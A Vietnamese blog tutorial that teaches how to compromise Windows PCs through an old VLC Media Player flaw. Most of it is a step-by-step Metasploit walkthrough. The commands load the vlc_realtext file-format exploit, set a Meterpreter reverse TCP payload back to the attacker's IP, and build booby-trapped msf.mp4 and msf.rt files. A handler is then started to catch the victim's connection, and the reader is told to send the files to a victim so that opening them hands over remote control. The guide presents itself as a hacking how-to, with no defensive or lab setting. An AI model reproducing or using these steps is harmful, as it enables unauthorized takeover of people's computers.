Home / Thủ Thuật / Hacking / BackTrack / Hướng dẫn hack PC sử dụng VLC Media Player

Hướng dẫn hack PC sử dụng VLC Media Player

Trong hướng dẫn này tôi sẽ chỉ cho bạn làm thế nào để hack máy tính, Đối với cách này các PC chạy HĐH windows trong mạng sẽ bị tấn công sử dụng VLC media player.
Công cụ cần thiết:

VLC Media Player 0.9.6

Windows XP SP 2

Yêu cầu bắt buộc:

Backtrack 5 (Xem hướng dẫn cài tại đây)

Máy tính nạn nhân có cài HĐH Windows

Step 1:

Chạy Backtrack

Nhập: msfconsole

Hướng dẫn hack PC sử dụng VLC Media Player

Hướng dẫn hack PC sử dụng VLC Media Player
Hướng dẫn hack PC sử dụng VLC Media Player

Step 2:

Bây giờ nhập: use exploit/windows/fileformat/vlc_realtext

Step 3:

Msf exploit (vlc_realtext)>set payload windows/meterpreter/reverse_tcp

Step 4:

Msf exploit (vlc_realtext)>set lhost 192.168.1.2 (IP of Local Host)

Step 5:

Msf exploit (vlc_realtext)>exploit

Step 6:

Bây giờ tập tin MP4 đã được tạo thành công.

Hướng dẫn hack PC sử dụng VLC Media Player

Step 7:

Tập tin sẽ được lưu vào thư mục trên máy tính của bạn.

Nó nằm ở: /root/.msf4/local/msf.mp4/root/.msf4/local/msf.rt

Step 8:

Sau khi khai thác thực hiện thành công.

Chúng ta phải thiết lập một bộ xử lý như kiểu: thông tin được gửi bởi nạn nhân.

Hướng dẫn hack PC sử dụng VLC Media Player

Step 9:

Nhập: use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.2

exploit

Step 10:

Bây giờ pack của bạn được tạo thành công.

Gửi cả hai tập tin msf.mp4 & msf.rt cho nạn nhân.

Ngay khi nạn nhân Download và mở nó, bạn sẽ nhận được quyền truy cập vào máy tính của nạn nhân bằng cách sử dụng Meterpreter

About dongpolicex2

Check Also

Copy video, ảnh từ iPhone iPad vào máy tính không cần iTunes

Có nhiều cách Copy video iPhone vào máy tính như: Đồng bộ video, ảnh từ …

Leave a Reply

Your email address will not be published. Required fields are marked *

0902 780 887